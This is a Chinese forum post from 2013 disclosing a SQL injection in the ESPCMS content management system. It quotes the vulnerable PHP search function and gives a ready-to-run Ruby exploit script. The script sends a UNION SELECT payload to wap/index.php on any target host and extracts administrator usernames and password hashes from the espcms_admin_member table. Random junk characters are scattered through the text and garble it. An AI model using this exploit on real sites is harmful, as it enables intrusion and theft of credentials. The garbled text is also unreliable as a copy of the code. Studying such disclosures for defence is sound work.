0×0 漏洞概述0×1 漏洞细节: L8 B# ?# J% `
0×2 PoC
a# C$ q" R% Q1 u" E- {& \' T8 Z! w! v
: R) k4 `3 n* K1 q9 |! H
f" J# j& F2 V/ k" K0×0 漏洞概述
) }8 F" T5 A' D, Z! P. s/ C. D; H* F1 T
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。* W+ J" b1 o8 X$ i, t
其在处理传入的参数时考虑不严谨导致SQL注入发生
" e" n+ k3 y; R3 Z3 B: [5 \6 l$ D- x2 \. O
3 u6 G: |% M. Z8 n7 E. [/ x7 v0×1 漏洞细节& v* n& D, }- i: c5 W- _- r
# E2 f9 t5 |1 n [1 n* _2 U/ F% f变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。! _3 V& E) [0 g6 O( O) K& q. T3 ^
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。' o0 ~* R' U* M, S: ?2 W' l9 ?
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
" T, Z, A+ Z. _' i
: [8 T. t. Z9 W" `4 J在/interface/3gwap_search.php文件的in_result函数中:
4 m$ {, r3 @& k8 I0 d f M* f
- W' f4 R8 z; ^1 h) G- b
6 s0 p% _& _, U. B K: J0 n$ m
3 O/ \# |- N% ?! U) S function in_result() {
0 t2 w# I0 ?* [0 y/ E ... ... ... ... ... ... ... ... ...
+ F0 Z. D( J$ f* C $urlcode = $_SERVER[ 'QUERY_STRING '];
( o& Q( o; Y5 _' O: J parse_str(html_entity_decode($urlcode), $output);
) Y1 F1 i. w& w; g6 f
$ X% r9 l7 p# J% d ... ... ... ... ... ... ... ... ...
Q; ]' E! r, g if (is_array($output['attr' ]) && count($output['attr']) > 0) {
3 ^' s7 ~' R4 \6 {) q: Z1 \* e5 x4 g) I
$db_table = db_prefix . 'model_att';6 C% i& r8 v0 w: Y! W
* h2 C! V+ [& g4 G, Y) x foreach ($output['attr' ] as $key => $value) {
; F. K& M0 U' G" C5 k7 Q3 f6 I& I6 h1 J if ($value) {
# A) U% c0 J7 |1 E1 k" B! U; `$ q# |1 i* W6 Y
$key = addslashes($key);) z% h" |/ N0 ]
$key = $this-> fun->inputcodetrim($key);
, G! w A6 ~$ U* M* z( _ $db_att_where = " WHERE isclass=1 AND attrname='$key'";! M% g g1 t9 ]
$countnum = $this->db_numrows($db_table, $db_att_where);
$ q' L0 I L: v5 v5 F if ($countnum > 0) {
+ R+ l$ l9 v1 I& k; r, I5 T $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;) C' ~3 O4 h% e
}
' }' L% P' {" }) b* r5 R }$ a/ m+ f/ x2 U: j
}
' `! c6 n5 h9 T5 \; l7 c4 |- C }
+ }7 ~6 V7 l3 Q( D6 Y% g" M if (!empty ($keyword) && empty($keyname)) {
" n q/ r) K1 a+ n" C! C! P $keyname = 'title';
% q3 l" P' e9 k5 E, C$ | $db_where.= " AND a.title like '%$keyword%'" ;
8 x$ e% n3 T, ? } elseif (!empty ($keyword) && !empty($keyname)) {7 e3 k: }# L: a, A, Z" b
$db_where.= " AND $keyname like '% $keyword%'";
* G( `; [0 Y' o7 l$ o- H }
4 _1 w+ ^. z Q7 j7 Y) l& S# r $pagemax = 15;
$ _5 a! A# K$ |
+ S5 M; t1 _+ c/ a $pagesylte = 1;2 v. W: }4 _. m% M1 X, A
, a' q+ }8 I/ X* J6 w5 E6 w if ($countnum > 0) {
5 ?7 j( b6 ^# R' r
/ N9 N$ N, {2 N: ^* `) u $numpage = ceil($countnum / $pagemax);
! ?) u: s& V1 d' S } else {; e0 H! }# Z0 [- v
$numpage = 1;4 b0 Y: ]2 ^* Y9 x8 i' i
}
% @4 w3 s) s$ Y2 P2 s $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
; m) q0 a r. q. A' i4 _. o8 P $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);" m& D9 i& x- l: s9 }) a k9 U
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);1 o, L; N) x7 t
... ... ... ... ... ... ... ... ...; G4 l) p: A" S# \( s; L" p
}7 _) c3 b- L9 S+ n* o
; ]1 P: v/ D( d8 y5 w$ O. ?5 I1 @( m7 y, w' A: H" ]# ?8 ]1 E0 r
0×2 PoC! l# |/ x5 m( g6 t) b
2 d- {& O2 h9 t& n9 L2 c; f1 f
. T3 j- @, I. Y T! l6 | u0 Q9 ?6 A9 f9 Q( Y" t' b
require "net/http"
! P6 F( ~/ ?# w& y: V
9 [0 l) Y2 v8 K4 Bdef request(method, url)0 |/ L4 }- m/ E& U6 w
if method.eql?("get")
7 e/ K5 i; N& h uri = URI.parse(url)
! e9 L: u' T7 P3 i6 d+ X" u http = Net::HTTP.new(uri.host, uri.port)
/ J' B* e# G: Y7 f7 V3 t' d _# b1 Q response = http.request(Net::HTTP::Get.new(uri.request_uri))
0 Q( c4 y/ C. ~& |+ D; @ return response2 N4 L# E2 _5 j
end
9 P& ~* ~. c# }7 N) Vend
. c. b9 s) }2 J) k1 B2 ~/ L
/ f' W7 J7 k# r7 C5 wdoc =<<HERE0 W8 x# ~6 P0 b# l% C: ?. C
-------------------------------------------------------
: _3 m8 q+ O1 t/ l: bEspcms Injection Exploit
: s% e+ [2 O, _) vAuthor:ztz3 \0 r4 J5 j9 J3 W1 Q3 r
Blog:http://ztz.fuzzexp.org/
5 r# D- _- z2 N-------------------------------------------------------* ]* {$ u: d* j% i
. s2 y( S6 t: c0 J" O* ]: MHERE
, v; D* ^) k7 v% D% F
- w; S! o- E) B; F qusage =<<HERE
) V6 @# p' a F- z8 NUsage: ruby #{$0} host port path- Y( n. M8 ?0 b8 e
example: ruby #{$0} www.target.com 80 /) k: j, S; V2 x6 |( @
HERE' w3 [% W0 ~: R! f* ]
* D* A9 u2 i) ^8 P/ f4 |$ H+ u
puts doc
6 N* W/ v* N/ u9 `' [if ARGV.length < 3
! N3 H: D& ^# \# o; {+ P puts usage* E' K0 Y/ }: \- Q# s
else
3 k& Q* I* Y0 c7 N9 ~# J% @ $host = ARGV[0]2 I& z P9 b- ^8 f0 t0 K
$port = ARGV[1]6 c9 o) W& G6 m
$path = ARGV[2]! u! o; s$ C1 x3 D/ I6 @1 W
; b8 d2 L5 d3 f0 e* G puts "send request..."
p0 o+ b& _: @/ E8 x url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&5 b: K: m% g2 Y
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
& @; j8 t* i5 n,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27/ t' ^3 h0 u, D# b! y1 j% U, H
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"8 t) q2 ^5 O1 I% b7 b$ g5 o( t
response = request("get", url)+ E* v, B7 b* y1 C+ n1 h, k* p: m
result = response.body.scan(/\w+&\w{32}/): w5 b0 A N9 L% J$ m( Y+ I
puts result
0 V& Z: `7 K4 f5 S% Z- Xend
" z) H% ] O7 ~- D5 \# ?
4 K5 M0 Q' u4 y6 h; O3 R& M7 D |
发表于 2013-7-27 18:31:52
收藏
支持
反对